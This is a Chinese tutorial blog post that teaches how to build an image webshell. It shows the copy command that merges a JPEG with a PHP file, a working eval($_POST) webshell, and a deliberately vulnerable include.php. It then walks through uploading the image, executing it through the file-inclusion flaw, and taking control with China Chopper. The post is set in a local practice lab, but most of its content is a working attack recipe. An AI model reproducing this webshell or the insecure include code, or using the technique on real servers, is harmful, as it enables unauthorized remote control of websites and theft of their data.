关于图片马的正确用法

有图片,有木马,然而菜刀连接不上,你绝望吗?不怕今天我会教大家的。

我们先看一下源码吧,过关方式也是叫我们上传图片马。。。

然后我还要说吗一下,图片马不是一张木马图片一个菜刀就可以了的。还需要一个漏洞,叫做文件包含漏洞。。。这个漏洞原理呢

一:准备图片马

需要用到DOS指令

Bash

copy 001.jpeg/b + test.php/a 2.jpg

这个指令的意思是,把001.jpeg和test.php合并到一起。很明显test.php就是webshell了

那么test.php里面的代码

PHP

<?php eval($_POST['yuer']); ?>

很明显,那个yuer就是我们的webshell密码。你可以改成你自己需要的。。。

然后打开CMD,切换到指定目录,合成之前是没有2.jpg的

好的,就会多出一个2.jpg...这就是图片马。

二:准备好我们的文件包含漏洞

文件有包含漏洞的php文件include.php,代码如下

PHP

<?php
$file = $_GET['file'];
include $file;
?>

这便是最简单的文件包含漏洞代码,那么这个漏洞是必须服务器端自带的,也就是说如果你要攻击的网站没有文件包含漏洞,图片马就是用不了的。

文件包含漏洞简单说就是,在这个include.php中需要引用其他应用程序,php中应用程序文件是.php也就是说,他本来想引用一个php文件,但是漏洞就是,他不会识别什么是php文件,只要是他引用的,他都当php来解析,所以如果他引用的是jpg,但是jpg中有图片马,那么他就相当于引用了图片马,同样的道理还会有zip马等等

这个具有文件包含漏洞的文件在这里。

三:上传图片马

成功上传图片马

然后我们先正常访问一下这个图片吧,因为我是本地搭建的服务器,所以我知道路径在哪里

可以看到图片是非常正常的,完全看不出有木马。

好,我们再用文件包含去访问一次这个图片,文件包含include.php在根目录里,然后呢.

四:菜刀链接

这一步就比较经典了,你必须把图片用,包含漏洞的链接去连接

然后呢,点击添加。。。再右键点击文件管理。。。

成功拿到webshell

 

  • 40
    点赞
  • 130
    收藏
    觉得还不错? 一键收藏
  • 14
    评论
评论 14
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值